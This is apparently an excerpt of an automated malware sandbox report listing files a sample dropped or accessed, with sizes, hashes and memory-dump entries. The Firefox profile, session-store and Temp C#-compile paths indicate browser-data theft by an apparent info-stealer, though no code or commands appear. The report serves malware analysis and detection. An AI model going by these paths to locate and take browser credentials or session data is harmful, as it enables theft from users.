0c5f5a3b74b14b2554ecf7b6a7026077679985dd

SHA256
c7452074b69a4e9fd57c9d5921363b14ae971f6ebfe6b2ce7c749e2c4c2c47d6

SHA512
8cd82442ae1bc883ecc1f7b8c8bda0c06b2fdac08da585b551aa61f1111de972769dc1f54d6439490b27b1135284c0b786dcaf9216c429c5b12cdf22e61deea8

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kx4f0sbu.default-release\prefs-1.js

Filesize
10KB

MD5
c6a4aeec90fc1522f61245660c0b4759

SHA1
214ae02266ca765f2fb6021185f49c396905ef76

SHA256
a41a9aebf7f3f28e374d3299e97f280e00c0ac9370f0c658d5b19595b456ecdc

SHA512
b8839294220d52a817a23b69d7d95604c86362eef512509b8dc798fb6ae72b2f72db139665f9f0e25f6fcbb5d5afbcecb1dd6ea3b3a5dcb88bb58b16db8386e6

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kx4f0sbu.default-release\prefs.js

Filesize
10KB

MD5
9e6da599d8e8efa4f72de96ba37bfb79

SHA1
35c536964740702175500b04739379b1ebda9784

SHA256
eda32598bd0c8989d33e1874bce29733838c433c6085467b970ce4e16766b2c8

SHA512
9c8b9952bdde2ae1dcb05202badfd669f8f0e32701bef7920c1a658845b44f16964b31118170c8854813b8782def4757ffa1603716da05fb28fe9c704e7e38d3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kx4f0sbu.default-release\sessionstore-backups\recovery.baklz4

Filesize
1KB

MD5
37233ce9872760f8574b3c1aad4aa813

SHA1
4e6912777116cfe849778b2c1f0895cc1458257b

SHA256
d89482bd52a31f6d51f886ab456986c00b07d8acd5ebe936cc30a6033aa594c3

SHA512
ae9620cf4a6c98c48f0cd632213cc9255ff6b93985350f6ff65c93877c2044d5de9d0a14b9fb5487167dab2dad0979539b42e81b8620a10350734edf8bc564cf

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kx4f0sbu.default-release\sessionstore-backups\recovery.baklz4

Filesize
24KB

MD5
e900135ab16bc9a2af2ae0e9819f2be5

SHA1
5b93c3a9194175cee2e264ac3f21034f8e41d1d6

SHA256
7641d4994e8e527b38f4841f64afce59d5b6892417f024f415abe6d8612a5bf7

SHA512
3a67cf4658fec5d362ac3897d9f423aebc3a3486abf1658afbead8ba06a4ab9bd72b72cb6a8eba9bf690cc071c7599975d9489b7cb73959c095cc535b792c9fc

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kx4f0sbu.default-release\sessionstore-backups\recovery.baklz4

Filesize
24KB

MD5
d98eb2b00721b3161555cb0798e2a4b9

SHA1
3c7240bc47b1f973e1d1281b665e1360926f8961

SHA256
b234c4431369bb73126788c83d88a2198940c0318ea5747a9d64eba267881b67

SHA512
846b6bcc0ab7f7d6ecc9e4fecf31a667d915c5ba4a5c990dc59ce4e86409a3359757c05ec9e4360d37894b785b26a29316c7a0f586f74658a75ce535525155c3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kx4f0sbu.default-release\sessionstore-backups\recovery.baklz4

Filesize
24KB

MD5
979ce054a7b4e54dfeece4c7e2263037

SHA1
c1b17cf8d8d5178ea353f162170a6d422e6f5bf4

SHA256
c6f46a8450a2e1a24b44eecde62914e0af044870d9cb78a3123d9c55320c52b8

SHA512
7ec87c90646f902fdab5a79fe16bf6e6abb21891360d2acb6fbe6851bf2a1e163c404374af25497f14de08087dd3c9787f75637653ccd37cbab67f3bf5e86264

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kx4f0sbu.default-release\sessionstore-backups\recovery.baklz4

Filesize
24KB

MD5
cbf5a82b34b54958afb1faba67451c1c

SHA1
3bdd242fceec1d836482e5bbbfeea027ac54dc13

SHA256
7a8da1bc5ee3fb11eea2a7180694b5a5b8df537e23caeadb80be4eb2b6842a91

SHA512
baa4b17311031a904671497a09fa3e139beaac43a1f6a3687f95e3000fd8813980b77d2520c13e32849b103ccfa9520f1c0a630ee42cfb874a5fad1b518afbd8

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kx4f0sbu.default-release\sessionstore-backups\recovery.baklz4

Filesize
24KB

MD5
69d5bd0172abcfea04f2e94d1b792e36

SHA1
cfb1e3e5ee308f6c7c628543a644aab682c533a1

SHA256
24e0dac3c41ef9e7bd962f851576361f79d75b8186a8df07bacc03cd02d2454a

SHA512
412e973f82cf365797f69239732ae61bab7a4f6a7fe40203df007c7efbe3a7c431bdba275ff3320507eca4ef5063f44cadf758523cb617ff6bbe9caaa5f9b2fd

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kx4f0sbu.default-release\sessionstore-backups\recovery.baklz4

Filesize
24KB

MD5
30315fa174b405e28f3a2049f1fd8e26

SHA1
05ed8fab068a4e914a9792710a1c1337e222815c

SHA256
83b90527edba3f98af4a0d7b236af5059da763491f86d8b1bd784418b6795ecf

SHA512
9e0ebb9be4bcae0cbbd710825baa226edaa0fe20ef9763b41249b175add518a48f107e8e13f7aecfa7add5e8680d89ae1641fe6fa85db1f7de7388afd16a18dd

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kx4f0sbu.default-release\sessionstore-backups\recovery.baklz4

Filesize
14KB

MD5
e4a843e842ce5db8b33600fa931a9208

SHA1
94d8ba5ab7b5ad313a7876cc05406b89a2bcd0db

SHA256
5c876f607ecab2f82df4e8d749086339a44c6b1ea98c8754de327359bc7b780b

SHA512
16b80eecf9233b098cd0ff2f22f1e7de4d53ab9446a7cbb25af6f16d1c0b790ceae90e8a1cfdefbc44f033c3c4a5ebd916bd630573068ad2322de75b1c3d6121

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kx4f0sbu.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

Filesize
624KB

MD5
c44b4bf77900e2a6520221227bd69427

SHA1
e34042a4f8188a18f4131547bb172ac0dcc4a75a

SHA256
864d84ac4f98b13f98ef921e0ecc8704cf8344994b1f18b66640b169c4aa86fd

SHA512
206637140525c12cee9d666bea7c5c3ca48c64551203c34769a8a3c03462d1704070e766e01a97f46a279e3d1fc10a87a259728797d8934b6d0f82e91f862ab2

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kx4f0sbu.default-release\xulstore.json

Filesize
141B

MD5
3500782eee445a1dc855f25660e00353

SHA1
ea4ade6955945a7981ce10864ee482a6c8667c2d

SHA256
cf569dde58f28c7831c03991348f0c14b51fae8305edb0e9ad6de0c01cf89de0

SHA512
71090f7dbf2f1ab74f4341a7b528e4637929ba15b893de22db787a1ae0d6ce4569f4cedc1600178dfe9eeddb3e16748c1f0603b03206187cfbc69356fa844f77

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\iptpxtbo\CSCA1D426AD1EF3493A96DDBCFBAED5321.TMP

Filesize
652B

MD5
e70bb846f7060c774dc0f5626f9dd6e4

SHA1
124802bc6c32a74a179a135563a219477d6c9ded

SHA256
0c86fb3e41945d2575eb622dcf3e97b10e176f6dbf32cb2f11d47c678d03b34e

SHA512
6816b4df97688c497d794b9321a24afd1ade76feba5220e5f09f34ff1eebd46fe8964a87788cc298789f6fbc27167fb0ff7b9628b6f2a1b8993d2652af81a443

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\iptpxtbo\iptpxtbo.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\iptpxtbo\iptpxtbo.cmdline

Filesize
607B

MD5
cece7ad28da59fb823016a93e30ba236

SHA1
11782b1704bad682a99bc1072f15f141c100f2f8

SHA256
5ed3f5ade3906de19f5473abe92148db92f5d5f303277dc0a8dd950949a371af

SHA512
657b64009c8988a40db74e5833d083645b2557dd267dda606fff50d0cab58ce199c436f7eac45d59a6ef4fee754ef5f7a839ef4e5803adef36cf737fe5702788

Download Submit
memory/2088-194-0x000001A26BA10000-0x000001A26BA18000-memory.dmp

Filesize
32KB

Download
memory/2708-307-0x00007FFDC4F50000-0x00007FFDC50C0000-memory.dmp

Filesize
1.4MB

Download
memory/2708-301-0x00007FFDC53D0000-0x00007FFDC59B9000-memory.dmp

Filesize
5.9MB

Download
memory/2708-335-0x00007FFDD43D0000-0x00007FFDD43E9000-memory.dmp

Filesize
100KB

Download
memory/2708-334-0x00007FFDD4290000-0x00007FFDD42BD000-memory.dmp

Filesize
180KB

Download
memory/2708-333-0x00007FFDDDF50000-0x00007FFDDDF5F000-memory.dmp

Filesize
60KB

Download
memory/2708-332-0x00007FFDD8FF0000-0x00007FFDD9013000-memory.dmp

Filesize
140KB

Download
memory/2708-331-0x00007FFDC48C0000-0x00007FFDC4C39000-memory.dmp

Filesize
3.5MB

Download
memory/2708-330-0x00007FFDC4100000-0x00007FFDC421C000-memory.dmp

Filesize
1.1MB

Download
memory/2708-329-0x00007FFDD3FD0000-0x00007FFDD3FDD000-memory.dmp

Filesize
52KB

Download
memory/2708-328-0x00007FFDD00F0000-0x00007FFDD0104000-memory.dmp

Filesize
80KB

Download
memory/2708-316-0x00007FFDC53D0000-0x00007FFDC59B9000-memory.dmp

Filesize
5.9MB

Download
memory/2708-338-0x00007FFDD3CB0000-0x00007FFDD3CC9000-memory.dmp

Filesize
100KB

Download
memory/2708-339-0x00007FFDD4250000-0x00007FFDD425D000-memory.dmp

Filesize
52KB

Download
memory/2708-77-0x00007FFDD00F0000-0x00007FFDD0104000-memory.dmp

Filesize
80KB

Download
memory/2708-70-0x00007FFDC53D0000-0x00007FFDC59B9000-memory.dmp

Filesize
5.9MB

Download
memory/2708-71-0x00007FFDC5140000-0x00007FFDC51F8000-memory.dmp

Filesize
736KB

Download
memory/2708-73-0x00007FFDC48C0000-0x00007FFDC4C39000-memory.dmp

Filesize
3.5MB

Download
memory/2708-340-0x00007FFDD0110000-0x00007FFDD013E000-memory.dmp

Filesize
184KB

Download
memory/2708-341-0x00007FFDC5140000-0x00007FFDC51F8000-memory.dmp

Filesize
736KB

Download
memory/2708-342-0x000001DB27B60000-0x000001DB27ED9000-memory.dmp

Filesize
3.5MB

Download
memory/2708-74-0x00007FFDD8FF0000-0x00007FFDD9013000-memory.dmp

Filesize
140KB

Download
memory/2708-336-0x00007FFDD4260000-0x00007FFDD4283000-memory.dmp

Filesize
140KB

Download
memory/2708-72-0x000001DB27B60000-0x000001DB27ED9000-memory.dmp

Filesize
3.5MB

Download
memory/2708-337-0x00007FFDC4F50000-0x00007FFDC50C0000-memory.dmp

Filesize
1.4MB

Download
memory/2708-246-0x00007FFDD3CB0000-0x00007FFDD3CC9000-memory.dmp

Filesize
100KB

Download
memory/2708-66-0x00007FFDD0110000-0x00007FFDD013E000-memory.dmp

Filesize
184KB

Download
memory/2708-64-0x00007FFDD4250000-0x00007FFDD425D000-memory.dmp

Filesize
52KB

Download
memory/2708-302-0x00007FFDD8FF0000-0x00007FFDD9013000-memory.dmp

Filesize
140KB

Download
memory/2708-290-0x00007FFDC48C0000-0x00007FFDC4C39000-memory.dmp

Filesize
3.5MB

Download
memory/2708-278-0x00007FFDC5140000-0x00007FFDC51F8000-memory.dmp

Filesize
736KB

Download
memory/2708-279-0x000001DB27B60000-0x000001DB27ED9000-memory.dmp

Filesize
3.5MB

Download
memory/2708-76-0x00007FFDDDF50000-0x00007FFDDDF5F000-memory.dmp

Filesize
60KB

Download
memory/2708-79-0x00007FFDD4290000-0x00007FFDD42BD000-memory.dmp

Filesize
180KB

Download
memory/2708-82-0x00007FFDC4100000-0x00007FFDC421C000-memory.dmp

Filesize
1.1MB

Download
memory/2708-80-0x00007FFDD3FD0000-0x00007FFDD3FDD000-memory.dmp

Filesize
52KB

Download
memory/2708-62-0x00007FFDD3CB0000-0x00007FFDD3CC9000-memory.dmp

Filesize
100KB

Download
memory/2708-60-0x00007FFDC4F50000-0x00007FFDC50C0000-memory.dmp

Filesize
1.4MB

Download
memory/2708-58-0x00007FFDD4260000-0x00007FFDD4283000-memory.dmp

Filesize
140KB

Download
memory/2708-56-0x00007FFDD43D0000-0x00007FFDD43E9000-memory.dmp

Filesize
100KB

Download
memory/2708-54-0x00007FFDD4290000-0x00007FFDD42BD000-memory.dmp

Filesize
180KB

Download
memory/2708-272-0x00007FFDD0110000-0x00007FFDD013E000-memory.dmp

Filesize
184KB

Download
memory/2708-25-0x00007FFDC53D0000-0x00007FFDC59B9000-memory.dmp

Filesize
5.9MB

Download
memory/2708-30-0x00007FFDD8FF0000-0x00007FFDD9013000-memory.dmp

Filesize
140KB

Download
memory/2708-32-0x00007FFDDDF50000-0x00007FFDDDF5F000-memory.dmp

Filesize
60KB

Download
memory/2708-129-0x00007FFDD4260000-0x00007FFDD4283000-memory.dmp

Filesize
140KB

Download
memory/2708-182-0x00007FFDC4F50000-0x00007FFDC50C0000-memory.dmp

Filesize
1.4MB

Download
memory/2984-101-0x000002A762720000-0x000002A762742000-memory.dmp

Filesize
136KB

Download